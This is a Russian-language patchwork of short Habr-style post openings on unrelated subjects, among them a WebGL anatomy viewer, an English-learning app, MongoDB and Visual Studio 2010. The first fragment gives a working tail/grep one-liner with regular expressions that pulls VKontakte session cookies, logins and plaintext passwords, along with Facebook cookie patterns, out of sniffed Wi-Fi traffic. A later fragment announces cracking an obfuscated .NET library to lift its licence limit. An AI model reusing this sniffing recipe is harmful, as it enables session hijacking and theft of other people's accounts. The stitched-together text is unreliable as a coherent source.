На видео показан угон сессии вконтакте.ру, который почему-то до сих пор не использует авторизацию с https и передает пароли открытым текстом.
Дамп трафика собирается программой kismac в формате libpcap и параллельно парсится grep-ом с использованием регулярных выражений, что позволяет в реальном времени выводить на экран все интересующие куки и пароли. При этом не используется никаких анализаторов пакетов.

regexp для перехвата вконтакте.ру:

tail -F pcap.файл | cat | grep -aEo «remixsid=[0-9a-f]+|l=[0-9]{3,12}|p=[0-9a-f]{36}|email=[^&]+&pass=[^ ]+»

для фейсбука:

c_user=[0-9]+|sid=[0-9]{1,5}|xs=[0-9a-f]{32}

Аналогичная конструкция будет работать и с дампом собранным с помощью airdump-ng.

Сегодня наткнулся на Google Body Browser. Имхо просто потрясающая вещь даже для тех, кто не занимается медициной.

Хотя действительно интересно наглядно посмотреть-покрутить где находится желудок, как идут нервы и т.д., но для меня, как веб-разработчика это первый действительно наглядный пример толкового использования WebGL — без установки никакого плагина в Chrome 9+ и FireFox4. Кроме того используется декомпрессия ресурсов на клиенте.

Отдельно отмечу возможности передачи прямых ссылок на определенный вид/орган, например вот так и возможности поиска органов с чем-то похожим на Google Instant (справа сверху — инпутбокс легко можно не заметить).

Возможно это не совсем точный блог, но имхо хороший пример использования веб-технологии «к месту», а не просто демонстрация очередной фичи.

Видео с демонстрации Google Web Browser'a с WebGL Camp'а можно посмотреть тут.

Вступление

В этой статье я хочу поделиться с уважаемым хабраобществом своим опытом анализа и модификации обфусцированной .NET сборки на примере COMET-библиотеки PokeIn.



Несколько дней назад я заинтересовался COMET решениями для ASP.NET и нашел несколько интересных библиотек, среди которых некогда бывшая бесплатной PokeIn. Очевидно она пользовалась некоторой популярностью, так как авторы перевели ее из разряда open source в платную. На сайте бибилиотеки есть возможность скачать бесплатную версию с некоторыми ограничениями, среди которых, пожалуй, самое важное — это ограничение в 10 одновременных соединений. С ним мы и будем бороться.

Привет, Хабраюзер.

Это невероятно, но факт — почти всю грамматику и слова английского языка, которые могут понадобиться обычному человеку, удалось уместить в одно небольшое приложение на флэш, чтобы сделать изучение языка более мобильным и простым.

Изучайте английский в свободное время, когда есть под рукой интернет или телефон — в метро, в пробке, перед сном — просто выполняйте упражнения и двигайтесь вперед.

В приложении нужно просто выбрать тему, которую вы хотели бы потренировать — предлоги, покупки, времена. Всем айтишникам особо рекомендуем тесты Computer words и Computer words 2.

Каждый тест состоит из десяти вопросов. Если что-то не получилось, выполните тест еще раз. Если что-то осталось непонятным — нажмите кнопку Notes рядом с каждым вопросом.

Удачи в изучении английского!

Вчера EditShare объявила начало публичного бета тестирования проекта Lightworks, Open Source видеоредактора, который стремится стать одним из главных конкурентов FinalCut.

Скачать и попробовать Lightworks можно зарегистрировавшись на официальном сайте бетатестирования.

Сегодня я задумался о том, как обфускаторы скрывают код методов от утилит деобфускации вроде NET.Reflector. Как ни странно, но я не нашел в интернете никакой полезной информации по этому вопросу (возможно, плохо искал) и поэтому пришлось провести маленькое исследования самостоятельно. Под катом краткая заметка о результатах. В примере кода будет снова использоваться Mono.Cecil и генерация кода, так что не забудьте прочитать мою первую статью.

При разработке одного проекта встала задача – определить по IP-адресу посетителя его страну и город, на русском языке. Поиск готового решения оказался безуспешным – русскоязычные базы стран можно найти (например, wipmania.com), но баз городов нет. Помощь пришла из-за границы, в лице англоязычного maxmind.com. База была приведена к нормальному состоянию (MySQL) и частично переведена на русский язык с помощью нескольких справочников (~6,000 названий, с учетом городов-тезок ~15,500).   Результат этой работы доступен для свободного скачивания.

Всем привет.

В комментариях к различным топикам на Хабре нередко видел вопросы класса «А зачем вам нужна SIP-телефония дома» и «Как все это безобразие работает». Некоторые темы на хабре уже раскрывались, но многое осталось в тени. Посему решил описать используемую мной схему SIP-устройств и сервисов, и набросать некоторые планы на будущее.

Просто повторять аксиому, что SIP – это далеко не только дешевые междугородние звонки через sipnet или других операторов я не буду, и постараюсь в данном топике раскрыть все многообразие возможных вариантов применения SIP в быту.

Год назад я писал про сервис “Рубашка на заказ”. На его примере я наблюдаю за процессом развития стартапа в сфере услуг. Кейс очень интересный: “куда двигаться, какие проблемы возникают, какие возможности внедрять, где черпать вдохновение”. Информацию я получаю прямо от руководства компании, так как эти люди являются давними клиентами нашей студии.
Итак, начну с изменений.

Представляю вашему вниманию сервис для отправки SMS через HTTP/HTTPS API.

Для кого предназначен сервис?

• Интернет-магазинам (уведомление о новом заказе).
• Небольшим проектам с системой уведомлений по SMS.
• Сисадминам (уведомления о состоянии сервисов, оборудования и т.п.).
• Вам? Напишите, обсудим.

От переводчика: Поясню, почему мне этот топик интересен. Во-первых, я сам когда-то занимался HDR фотографией. А во-вторых, когда зеркалки стали снимать видео, я был поражен, как одна профессиональная фуллфреймовая зеркалка с набором хороших линз может порвать профессиональные видеокамеры. Теперь это объединили: двумя зеркалками сняли видео, и сделали из этого HDR. Мне кажется, это достойно того, чтобы перевести и показать вам...

От всей души рекомендую видео лекцию А. Степанова (человека создавшего STL): «о истории алгоритма нахождения наибольшего общего делителя», это популярная лекция оказалась бесконечно интересной, в ней рассказывается, на примере этого алгоритма о развитие алгоритмического знания всего человечества с эпистемологической точки зрения в разрезе истории с античных времен с Пифагора до наших дней до Кнута.


Посмотреть можно здесь:
часть1
video.yandex.ru/users/ya-events/view/129
часть2
video.yandex.ru/users/ya-events/view/128

Как разработчик, вы сидите на золотой жиле. Вы осознаете это?

Нет, серьезно, на @#$% золотой жиле! Никогда в истории не существовало возможностей так легко создать что-то с нуля, с маленьким или отсутствующим начальным капиталом и маркетинговой моделью, ограниченной только вашим воображением.

Подумайте о крупнейших сайтах, которые вы постоянно посещаете: Facebook, Twitter, Flickr, Foursquare, или даже Google — все они были созданы разработчиками, у которых была лишь идея. Было ли это легко? Черт, нет. Но это могло быть сделано только в наше время. Так, черт побери, почему вы просиживаете день за днем, работая на кого-то?

У меня небольшой опыт написания статей, но все же я хотел бы рассказать хабралюдям о нашем проекте.

О проекте в одном приложении

Предоставление возможности просмотра и тюнинга 3d-модели автомобиля прямо в браузере.

Вольный перевод GTD-диаграммы Дэвида Аллена.

Недавно вышел новый Eclipse Helios, среди нововведений которого есть поддержка таскбара Windows 7 и дока Mac OS X. В частности, Эклипс может отображать прогресс сборки, наличие ошибок и предупреждений. К хорошему быстро привыкаешь, и мне захотелось иметь нечто подобное в Visual Studio 2010. Подходящего расширения в сети не нашлось, так что пришлось делать его самому.

Статья раскрывает смысл термина «64 бита». В статье кратко рассмотрена история развития 64-битных систем, описаны наиболее распространенные на данный момент 64-битные процессоры архитектуры Intel 64 и 64-битная операционная система Windows.

В данной статье, я хотел бы рассказать, как работать с NoSQL и документо-ориентированной базой данных MongoDB, NoRM и ASP.NET MVC 2.

NoSQL и документо-ориентированная база данных

В этом году особенно заметны активные движения в направлении NoSQL и люди постоянно обсуждают о применении  документо-ориентированных баз вместе с веб-приложениями. Согласно Википедии “NoSQL — движение, продвигающее свободный класс не реляционных хранилищ данных, которое прервало длинную историю реляционных баз данных.  Данные хранилища могут не требовать фиксированных схем для таблиц, чаще всего избегают join-операций и обычно имеют горизонтальное масштабирование. Преподаватели часто ссылаются на подобные базы данных, как на структурированные хранилища.

Возрадуйтесь, дети мои, ибо пришёл я к вам с миром и богатыми дарами. Нет, я не принёс вам того, чего вы не видели. И даже не принёс того, чего вы не имели. От чистого сердца вручаю вам то, что всегда лежало у вас под ногами, но вы не замечали того, брезгливо перешагивая, пробегая мимо по своим, несомненно самым важным, делам.

Константы! Да, ваши чаяния достигли моих ушей, пробрались в глубины души и вырвали наружу эти прекрасные создания, позволяющие синхронно менять связанные значения в разных частях файла.

Примеси! Я же знаю, вы так устали без наследования. Приходится внедрять лишние классы в элементы или даже, переходить на тёмную сторону силы — копипастить по чёрному.

Отныне! Ваша душа будет чиста как у младенца. Руки в золоте как у царевичей. Дети послушными и приветливыми.

Это двадцать первая статья из серии, посвященной выходу VS 2010 и .NET 4. Сегодняшний пост поведает вам о некоторых приятных улучшениях в юзабилити, которые пришли с отладчиком в VS 2010.

Отладчик VS 2010 содержит тонны отличных возможностей таких, как Intellitrace (он же исторический отладчик), новая возможность параллельной/многопоточной отладки и поддержка дампа отладки, которые заслуженно привлекают внимание, если мы говорим о новой версии.

В сегодняшнем же посте, я начну рассказывать о некоторых небольших, но тем не менее приятных моментов юзабилити во время отладки, которые появились с VS 2010.